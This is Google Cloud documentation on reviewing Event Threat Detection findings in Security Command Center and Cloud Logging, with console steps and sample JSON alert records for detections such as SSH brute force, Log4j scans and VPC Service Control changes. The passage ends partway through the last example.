Using Event Threat Detection

This page shows you how to review Event Threat Detection findings in the Google Cloud console and includes examples of Event Threat Detection findings.

Event Threat Detection is a built-in service that monitors the Cloud Logging logging streams for your organization or projects and detects threats in near-real time. If you activate Security Command Center at the organization level, Event Threat Detection can also monitor your organization's Google Workspace logging streams. To learn more, see Event Threat Detection overview.

Enable or disable Event Threat Detection

By default, Event Threat Detection is enabled. For general information about how to enable or disable a built-in service or its modules, see Configure Security Command Center services.

Reviewing findings

To view Event Threat Detection findings, the service must be enabled in Security Command Center Services settings. After you enable Event Threat Detection, Event Threat Detection generates findings by scanning specific logs. Some of the logs Event Threat Detection can scan are turned off by default, so you might need to turn them on.

For more information about the built-in detection rules that Event Threat Detection uses and the logs that Event Threat Detection scans, see the following topics:

You can view Event Threat Detection findings in Security Command Center. If you configured Continuous Exports to write logs, you can also view findings in Cloud Logging. Continuous Exports to Cloud Logging are only available when you activate Security Command Center at the organization level. To generate a finding and verify your configuration, you can intentionally trigger a detector and test Event Threat Detection.

Event Threat Detection activation occurs within seconds. Detection latencies are generally less than 15 minutes from the time a log is written to when a finding is available in Security Command Center. For more information on latency, see Security Command Center latency overview.

Reviewing findings in Security Command Center

The IAM roles for Security Command Center can be granted at the organization, folder, or project level. Your ability to view, edit, create, or update findings, assets, and security sources depends on the level for which you are granted access. To learn more about Security Command Center roles, see Access control.

Use the following procedure to review findings in the Google Cloud console:

  1. In the Google Cloud console, go to the Security Command Center Findings page.

  2. If necessary, select your Google Cloud project or organization.

  3. In the Quick filters section, in the Source display name subsection, select one or both of the following:

    The table is populated with Event Threat Detection findings.

  4. To view details of a specific finding, click the finding name under Category. The finding details pane expands to display information including the following:

    • When the event occurred
    • The source of the finding data
    • The detection severity, for example High
    • The actions taken, like adding an Identity and Access Management (IAM) role to a Gmail user
    • The user who took the action, listed next to Principal email
  5. To display all findings that were caused by the same user's actions:

    1. On the finding details pane, copy the email address next to Principal email.
    2. Close the pane.
    3. In query editor, enter the following query:

      access.principal_email="USER_EMAIL"

      Replace USER_EMAIL with the email address you previously copied.

      Security Command Center displays all findings that are associated with actions taken by the user you specified.

Viewing findings in Cloud Logging

If you configure Continuous Exports to write logs, you can view Event Threat Detection findings in Cloud Logging. This feature is only available if you activate Security Command Center Premium tier at the organization level.

To view Event Threat Detection findings in Cloud Logging, do the following:

  1. Go to Logs Explorer in the Google Cloud console.

  2. Select the Google Cloud project or other Google Cloud resource where you are storing your Event Threat Detection logs.

  3. Use the Query pane to build your query in one of the following ways:

    • In the All resources list, do the following:
      1. Select Threat Detector to display a list of all the detectors.
      2. To view findings from all detectors, select all detector_name. To view findings from a specific detector, select its name.
      3. Click Apply. The Query results table is updated with the logs you selected.
    • Enter the following query in the query editor and click Run query:

      resource.type="threat_detector"

      The Query results table is updated with the logs you selected.

  4. To view a log, select a table row, and then click Expand nested fields.

You can create advanced log queries to specify a set of log entries from any number of logs.

Example finding formats

This section provides examples of JSON output for Event Threat Detection findings. You see this output when you export findings using the Google Cloud console or list findings using the Security Command Center API or the Google Cloud CLI.

The examples on this page show different types of findings. Each example includes only the fields that are most relevant to that type of finding. For a complete list of fields that are available in a finding, see the Security Command Center API documentation for the Finding resource.

Example findings for the following detection categories are shown below.

Active Scan: Log4j Vulnerable to RCE

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
    "state": "ACTIVE",
    "category": "Active Scan: Log4j Vulnerable to RCE",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "log4j_scan_success"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"},
        {"gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"}
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {"seconds": "1639701222", "nanos": 7.22988344E8},
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "scannerDomain": "SCANNER_DOMAIN",
        "sourceIp": "SOURCE_IP_ADDRESS",
        "vpcName": "default"
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1210/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-12-17T00:33:42.722988344Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ],
        "relatedFindingUri": {}
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-12-17T00:33:42.722Z",
    "createTime": "2021-12-17T00:33:44.633Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.compute.Instance",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID",
        "resourceFolderDisplayName": "FOLDER_DISPLAY_NAME"
      }
    ],
    "displayName": "INSTANCE_ID"
  }
}

Brute Force: SSH

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Brute Force: SSH",
    "sourceProperties": {
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "timestamp": {"nanos": 0.0, "seconds": "65"},
            "insertId": "INSERT_ID",
            "resourceContainer": "projects/PROJECT_ID"
          }
        }
      ],
      "properties": {
        "projectId": "PROJECT_ID",
        "zone": "us-west1-a",
        "instanceId": "INSTANCE_ID",
        "attempts": [
          {"sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "SUCCESS"},
          {"sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "FAIL"},
          {"sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "FAIL"}
        ]
      },
      "detectionPriority": "HIGH",
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/003/"
        }
      },
      "detectionCategory": {
        "technique": "brute_force",
        "indicator": "flow_log",
        "ruleName": "ssh_brute_force"
      },
      "affectedResources": [
        {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
      ]
    },
    "severity": "HIGH",
    "eventTime": "1970-01-01T00:00:00Z",
    "createTime": "1970-01-01T00:00:00Z"
  }
}

Cloud IDS

{
  "finding": {
    "access": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Cloud IDS: THREAT_ID",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "connections": [
      {
        "destinationIp": "IP_ADDRESS",
        "destinationPort": PORT,
        "sourceIp": "IP_ADDRESS",
        "sourcePort": PORT,
        "protocol": "PROTOCOL"
      }
    ],
    "createTime": "TIMESTAMP",
    "database": {},
    "description": "This signature detects a payload in HTTP traffic which could possibly be malicious.",
    "eventTime": "TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_DISPLAY_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "ctd-engprod-project",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/PARENT_NUMBER",
    "parent_display_name": "PARENT_DISPLAY_NAME",
    "folders": [
      {
        "resource_folder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resource_folder_display_name": "FOLDER_DISPLAY_NAME"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "cloud_ids_threat_activity"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {"seconds": "TIMESTAMP", "nanos": TIMESTAMP},
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LOGGING_QUERY_URI"
        }
      ],
      "relatedFindingUri": {}
    },
    "description": "THREAT_DESCRIPTION"
  }
}

Defense Evasion: Breakglass Workload Deployment Created

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "k8s.io",
      "methodName": "io.k8s.core.v1.pods.create"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Defense Evasion: Breakglass Workload Deployment Created",
    "cloudDlpInspection": {},
    "containers": [
      {"name": "test-container", "uri": "test-image"}
    ],
    "createTime": "2023-03-24T17:38:45.756Z",
    "database": {},
    "eventTime": "2023-03-24T17:38:45.709Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "NAMESPACE",
          "name": "POD_NAME",
          "labels": [
            {"name": "image-policy.k8s.io/break-glass", "value": "true"}
          ],
          "containers": [
            {"name": "CONTAINER_NAME", "uri": "CONTAINER_URI"}
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "DEFENSE_EVASION",
      "primaryTechniques": ["ABUSE_ELEVATION_CONTROL_MECHANISM"]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_NUMBER/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE",
    "display_name": "default",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "parent_display_name": "CLUSTER_NAME",
    "type": "k8s.io.Namespace",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1548/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    },
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "binary_authorization_breakglass_workload",
      "subRuleName": "create"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {"gcpResourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE"},
      {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {"seconds": "1679679521", "nanos": 141571000},
          "insertId": "INSERT_ID"
        }
      }
    ]
  }
}

Defense Evasion: Breakglass Workload Deployment Updated

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "k8s.io",
      "methodName": "io.k8s.core.v1.pods.update"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Defense Evasion: Breakglass Workload Deployment Updated",
    "cloudDlpInspection": {},
    "containers": [
      {"name": "test-container", "uri": "test-image"}
    ],
    "createTime": "2023-03-24T17:38:45.756Z",
    "database": {},
    "eventTime": "2023-03-24T17:38:45.709Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "NAMESPACE",
          "name": "POD_NAME",
          "labels": [
            {"name": "image-policy.k8s.io/break-glass", "value": "true"}
          ],
          "containers": [
            {"name": "CONTAINER_NAME", "uri": "CONTAINER_URI"}
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "DEFENSE_EVASION",
      "primaryTechniques": ["ABUSE_ELEVATION_CONTROL_MECHANISM"]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_NUMBER/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE",
    "display_name": "default",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "parent_display_name": "CLUSTER_NAME",
    "type": "k8s.io.Namespace",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1548/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    },
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "binary_authorization_breakglass_workload",
      "subRuleName": "update"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {"gcpResourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE"},
      {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {"seconds": "1679679521", "nanos": 141571000},
          "insertId": "INSERT_ID"
        }
      }
    ]
  }
}

Defense Evasion: Modify VPC Service Control

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//accesscontextmanager.googleapis.com/accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER",
    "state": "ACTIVE",
    "category": "Defense Evasion: Modify VPC Service Control",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "modify_auth_process",
        "indicator": "audit_log",
        "ruleName": "vpcsc_changes",
        "subRuleName": "reduce_perimeter_protection"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {"gcpResourceName": "//accesscontextmanager.googleapis.com/accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER"},
        {"gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"}
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {"seconds": "1633625631", "nanos": 1.78978E8},
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "name": "accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER",
        "policyLink": "LINK_TO_VPC_SERVICE_CONTROLS",
        "delta": {
          "restrictedResources": [
            {"resourceName": "PROJECT_NAME", "action": "REMOVE"}
          ],
          "restrictedServices": [
            {"serviceName": "SERVICE_NAME", "action": "REMOVE"}
          ],
          "allowedServices": [
            {"serviceName": "SERVICE_NAME", "action": "ADD"}
          ],
          "accessLevels": [
            {"policyName": "ACCESS_LEVEL_POLICY", "action": "ADD"}
          ]
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1556/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-07T16:53:51.178978Z%22%0AinsertId%3D%22-INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-10-07T16:53:53.875Z",
    "createTime": "2021-10-07T16:53:54.411Z",
    "severity": "MEDIUM",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": {},
      "serviceName": "accesscontextmanager.googleapis.com",
      "methodName": "google.identity.accesscontextmanager.v1.AccessContextManager.UpdateServicePerimeter"
    }
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "type": "google.cloud.resourcemanager.Organization",
    "displayName": "RESOURCE_DISPLAY_NAME"
  }
}

Discovery: Can get sensitive Kubernetes object check

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {"regionCode": "US"},
      "serviceName": "k8s.io",
      "methodName": "io.k8s.authorization.v1.selfsubjectaccessreviews.create"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/03f466dc25a8496693b7482304fb2e7f",
    "category": "Discovery: Can get sensitive Kubernetes object check",
    "contacts": {
      "technical": {
        "contacts": [
          {"email": "EMAIL_ADDRESS"},
          {"email": "EMAIL_ADDRESS"},
          {"email": "EMAIL_ADDRESS"}
        ]
      }
    },
    "createTime": "2022-10-08T01:39:42.957Z",
    "database": {},
    "eventTime": "2022-10-08T01:39:40.632Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {
      "accessReviews": [
        {"name": "secrets-1665218000", "resource": "secrets", "verb": "get"}
      ]
    },
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/03f466dc25a8496693b7482304fb2e7f",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "can_get_sensitive_object"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {"gcpResourceName": "//k8s.io/authorization.k8s.io/v1/selfsubjectaccessreviews"},
      {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {"seconds": "1665193180", "nanos": 632000000},
          "insertId": "84af497e-b00e-4cf2-8715-3ae7031880cf"
        }
      }
    ],
    "properties": {},
    "findingId": "03f466dc25a8496693b7482304fb2e7f",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0007/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T01:39:40.632Z%22%0AinsertId%3D%2284af497e-b00e-4cf2-8715-3ae7031880cf%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Discovery: Service Account Self-Investigation

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Discovery: Service Account Self-Investigation",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "discovery",
        "indicator": "audit_log",
        "ruleName": "iam_anomalous_behavior",
        "subRuleName": "service_account_gets_own_iam_policy"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {"seconds": "1619200104", "nanos": 9.08E8},
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceAccountGetsOwnIamPolicy": {
          "principalEmail": "USER_EMAIL@PROJECT_ID.iam.gserviceaccount.com",
          "projectId": "PROJECT_ID",
          "callerIp": "IP_ADDRESS",
          "callerUserAgent": "CALLER_USER_AGENT",
          "rawUserAgent": "RAW_USER_AGENT"
        }
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "Permission Groups Discovery: Cloud Groups",
          "url": "https://attack.mitre.org/techniques/T1069/003/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "LOGGING_LINK"
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-23T17:48:24.908Z",
    "createTime": "2021-04-23T17:48:26.922Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parentDisplayName": "ORGANIZATION_NAME",
    "type": "google.cloud.resourcemanager.Project"
  }
}

Evasion: Access from Anonymizing Proxy

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Evasion: Access from Anonymizing Proxy",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "proxy_access"
      },
      "detectionPriority": "MEDIUM",
      "affectedResources": [
        {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {"seconds": "1633625631", "nanos": 1.78978E8},
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "changeFromBadIp": {
          "principalEmail": "PRINCIPAL_EMAIL",
          "ip": "SOURCE_IP_ADDRESS"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1090/003/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-07T16:53:51.178978Z%22%0AinsertId%3D%22-INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-10-07T16:53:53.875Z",
    "createTime": "2021-10-07T16:53:54.411Z",
    "severity": "MEDIUM",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
